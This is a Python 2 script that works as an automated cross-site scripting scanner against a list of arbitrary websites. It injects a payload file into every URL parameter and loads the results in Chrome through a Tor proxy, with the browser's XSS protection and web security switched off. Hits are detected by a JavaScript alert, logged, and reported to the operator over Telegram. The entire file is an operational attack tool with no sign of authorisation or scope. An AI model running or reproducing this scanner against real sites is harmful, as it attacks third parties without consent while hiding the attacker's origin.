#export PATH=$PATH:/home/.../gecko
 
import urlparse
import requests
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.keys import Keys
import time
import signal
import os
import telepot
import re


# Fuzz vectors for the URL currently being processed: payload APPENDED
# to each parameter value (filled by fuzz_url in the main loop).
global_vectors = list()
# Fuzz vectors where the payload REPLACES each parameter value
# (filled by fuzz_url_overlap in the main loop).
global_vectors_overlap = list()
# Telegram bot API token -- fill in to enable vulnerability notifications.
token = ''
# Domain of the last reported finding, used to avoid duplicate Telegram messages.
last_detected = 'last vuln url'

def get_current_domain(url):
    """Return the scheme://netloc/ prefix of *url* (trailing slash included)."""
    uri = urlparse.urlparse(url)
    return uri.scheme + '://' + uri.netloc + '/'

def log_to_file(filename, text):
    """Append str(text) plus a newline to *filename*, creating it if needed.

    The file is opened in append mode so repeated calls accumulate lines.
    """
    filename = str(filename)
    # BUG FIX: the original called file.close() AFTER the with-block, which had
    # already closed the file -- redundant and misleading; removed along with
    # the bare trailing `return`.
    with open(filename, 'a') as f:
        f.write(str(text))
        f.write('\n')

def read_payload(filename):
    """Return the FIRST line of *filename* split on newlines.

    A file containing "payload\\n..." yields ['payload', ''], so callers'
    ``''.join(read_payload(...))`` recovers the bare payload string.

    BUG FIX: the original implicitly returned None for an empty file,
    which crashed every ``''.join(...)`` caller; return [''] instead so
    the joined payload is simply the empty string.
    """
    filename = str(filename)
    with open(filename, 'r') as f:
        for line in f:
            return line.split('\n')
    return ['']
            
def count_fuzzed_loops(url):
    """Return the number of distinct query-string parameters in *url*.

    BUG FIX: the original body referenced the undefined name ``fuzzed_url``
    instead of the ``url`` parameter, so every call raised NameError.
    """
    parsed_url = urlparse.urlparse(url)
    query_as_dict = urlparse.parse_qs(parsed_url.query)
    return len(query_as_dict)
    
def fuzz_url(fuzzed_url):
    """Build one mutated query string per parameter of *fuzzed_url*.

    For each query parameter in turn, produce a copy of the full query
    where the payload read from 'payload.test' is APPENDED to that
    parameter's original value.  Parameters are emitted in reverse
    dict-iteration order, joined with '&'.  Returns the list of query
    strings (no scheme/host part).
    """
    payload = ''.join(read_payload('payload.test'))

    query_as_dict = urlparse.parse_qs(urlparse.urlparse(fuzzed_url).query)
    names = list(query_as_dict)
    # parse_qs maps each name to a list of values; collapse them to one string.
    originals = [''.join(query_as_dict[name]) for name in names]

    vectors = list()
    for target in range(len(names)):
        # Fresh copy of the values, then taint only the current parameter.
        mutated = list(originals)
        mutated[target] = originals[target] + payload
        # Reverse order with '&' between pairs, matching the original output.
        pairs = [names[i] + '=' + mutated[i] for i in reversed(range(len(names)))]
        vectors.append('&'.join(pairs))
    return vectors

def fuzz_url_overlap(fuzzed_url):
    """Build one mutated query string per parameter of *fuzzed_url*.

    Same construction as fuzz_url(), except the payload read from
    'payload.test' REPLACES (overlaps) the target parameter's value
    instead of being appended to it.  Parameters are emitted in reverse
    dict-iteration order, joined with '&'.  Returns the list of query
    strings (no scheme/host part).
    """
    payload = ''.join(read_payload('payload.test'))

    query_as_dict = urlparse.parse_qs(urlparse.urlparse(fuzzed_url).query)
    names = list(query_as_dict)
    # parse_qs maps each name to a list of values; collapse them to one string.
    originals = [''.join(query_as_dict[name]) for name in names]

    vectors = list()
    for target in range(len(names)):
        # Fresh copy of the values, then overwrite only the current parameter.
        mutated = list(originals)
        mutated[target] = payload
        # Reverse order with '&' between pairs, matching the original output.
        pairs = [names[i] + '=' + mutated[i] for i in reversed(range(len(names)))]
        vectors.append('&'.join(pairs))
    return vectors
   
def fuzz():
    global global_vectors
    global token
    global last_detected
    for x in global_vectors:
        browser = init_browser()
        attack_url = parsed_url.scheme + '://' +  parsed_url.netloc + parsed_url.path + '?' + x
        print "attack_url = ",attack_url
        domain = ''.join(attack_url)
        print "domain = ",get_current_domain(domain) 
        try:
            r = requests.head(get_current_domain(domain))
            print(r.status_code)
            status = r.status_code
        # prints the int of the status code
        except requests.ConnectionError:
            print("failed to connect")
            status = "error"
        log_to_file("requests.log",str(status) +' : ' + get_current_domain(domain)) 
        try:
            browser.get(attack_url)
        except:
	        pass
        domain_name_to_screen = get_current_domain(domain)
        domain_name_to_screen = domain_name_to_screen.replace('/','')
        domain_name_to_screen = domain_name_to_screen.replace(':','')

        print "screen+name = ", domain_name_to_screen
        screen_filename =  domain_name_to_screen + '_' + time.strftime("%Y%m%d-%H%M%S") + '_screen.png'
        #browser.get_screenshot_as_file(screen_filename)
        try:
            browser.find_the_element_by_id("add_button").click() 
        except:
			pass

        log_to_file("fuzzed_urls.txt",attack_url)
        log_to_file("fuzzed_urls.txt",screen_filename)
        log_to_file("fuzzed_urls.txt","-------------------------------------------")
        
        try:
            WebDriverWait(browser, 3).until(EC.alert_is_present(),
                                   'Timed out waiting for PA creation ' +
                                   'confirmation popup to appear.')
            try:
                alert = browser.switch_to_alert()
                alert.accept()    
            except:
                pass
            print "ALERT ACCEPTED"

            log_to_file("vectors.txt",attack_url)
            log_to_file("vectors.txt",screen_filename)
            log_to_file("vectors.txt","-------------------------------------------")

            print "test last",last_detected
            print "test current",get_current_domain(domain)

            if (last_detected not in get_current_domain(domain)):
                TelegramBot = telepot.Bot(token)
                TelegramBot.sendMessage('3072759','https://www.openbugbounty.org/search/?search='+get_current_domain(domain)+'&type=host')
                print "send message to telegramm"
                last_detected = get_current_domain(domain)
            print "-------------------------------------------"
        except:
            print "NOPE"
            print "-------------------------------------------"
            try:
                browser.get_screenshot_as_file("./images/" + screen_filename)
            except:
                pass

        #watchdog label
        try:
            browser.close()
            browser.quit()
        except:
            pass
        os.system("killall chromium-browser")
        os.system("sh kill-chrome.sh")
        time.sleep(5)
        open("time.tmp", 'w').close()
        timestamp = time.strftime("%H:%M:%S")
        print "time = ",timestamp
        log_to_file("time.tmp",timestamp) 

         

# --- script start: reset the watchdog timestamp file ---
# clean tmp file and save timestamp (time.tmp is read by an external watchdog)
open("time.tmp", 'w').close()
timestamp = time.strftime("%H:%M:%S")
print "time = ",timestamp
log_to_file("time.tmp",timestamp) 

# URLs already fuzzed in previous runs, one per line in fuzzed_urls.log;
# used below to skip duplicates across restarts.
log_file = []

with open('fuzzed_urls.log', 'r') as l:
    for log_line in l:
        log_file.append(log_line.strip('\n'))


def init_browser():
    """Create and return a Chrome WebDriver configured for fuzzing.

    The browser is routed through a local SOCKS5 proxy (Tor default port
    9050) with the XSS auditor and web security disabled so payloads are
    not filtered, and with a 30 s page-load timeout.
    """
    chrome_options = webdriver.ChromeOptions()
    chrome_options.add_argument('--proxy-server=socks5://127.0.0.1:9050')
    chrome_options.add_argument('--disable-xss-auditor')
    chrome_options.add_argument('--disable-web-security')
    chrome_options.add_argument('--enable-devtools-experiments')
    chrome_options.add_argument('--disable-images')
    chrome_options.add_argument('--disable-background-mode')
    # BUG FIX: the original created TWO Chrome instances -- one with the
    # explicit driver path but no options (leaked on every call), then a
    # second with options but the default driver path.  Create a single
    # instance with both the driver path and the options.
    browser = webdriver.Chrome('/usr/bin/chromedriver', chrome_options=chrome_options)
    browser.set_page_load_timeout(30)
    return browser


# Main driver: read target URLs and fuzz each one not seen in a previous run.
with open('urls.txt', 'r') as f:
    for line in f:
        # Skip URLs already recorded in fuzzed_urls.log.
        if line.strip('\n') not in log_file:
            print line
        
            url_to_parse = line
       
            # Module-level parsed_url is read by fuzz() to rebuild attack URLs.
            parsed_url = urlparse.urlparse(url_to_parse)
        
            # Build both vector sets: payload appended and payload overwriting.
            global_vectors = fuzz_url(url_to_parse)
            global_vectors_overlap = fuzz_url_overlap(url_to_parse)
        
            global_vectors = global_vectors + global_vectors_overlap
            
            # Mark the URL as processed up front so a crash does not retry it.
            log_to_file("fuzzed_urls.log",line)
            
            fuzz()
            
            # Reset the shared vector lists for the next URL.
            del global_vectors[:]
            del global_vectors_overlap[:]

#browser.close()
#browser.quit()
